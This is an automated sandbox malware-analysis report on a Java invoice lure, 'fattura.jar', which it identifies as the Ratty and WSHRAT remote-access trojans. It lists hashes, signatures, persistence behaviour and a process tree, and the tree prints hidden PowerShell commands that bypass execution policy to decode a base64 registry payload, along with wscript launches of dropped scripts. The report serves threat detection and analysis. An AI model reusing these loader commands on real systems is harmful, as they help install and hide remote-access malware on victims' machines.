Analysis

  • max time kernel
    148s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    10-07-2020 10:24

General

  • Target

    fattura.jar

  • Size

    221KB

  • MD5

    4ebaf0ed00b6136fe1e4273508d855fa

  • SHA1

    a3e6b82b95500b8eda4ab37a8f3865d47af3c7ad

  • SHA256

    be32a4b1ba9b1ac7803eac01ca4a38f96770ad27d2d434794809ba3242182b0d

  • SHA512

    80c243457a0b879b0cd2484837357326593131207e200f93cd4f40a2ce5dd4c8e5590c6f67638b7942c1ca6634abc637fa9658b81791116419960deb349f49c3

Malware Config

Signatures

  • Ratty

    Ratty is an open source Java Remote Access Tool.

  • Ratty Rat Payload 1 IoCs
  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

  • Blacklisted process makes network request 25 IoCs
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\fattura.jar
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1104
    • C:\Windows\system32\wscript.exe
      wscript C:\Users\Admin\wppvqiibus.vbs
      2⤵
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!%','m');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1636
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\gVbTbNmsTj.vbs"
        3⤵
        • Blacklisted process makes network request
        • Drops startup file
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:1520
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!%','A');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1928
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre7\bin\javaw.exe" -version 2> C:\Users\Admin\AppData\Local\Temp\output.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Program Files\Java\jre7\bin\javaw.exe
          "C:\Program Files\Java\jre7\bin\javaw.exe" -version
          4⤵
            PID:1844
        • C:\Program Files\Java\jre7\bin\javaw.exe
          "C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\ntfsmgr.jar"
          3⤵
          • Suspicious behavior: GetForegroundWindowSpam
          PID:1676

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1500-12-0x00000000028B0000-0x00000000028B4000-memory.dmp

    Filesize

    16KB

  • memory/1520-18-0x0000000000320000-0x0000000000322000-memory.dmp

    Filesize

    8KB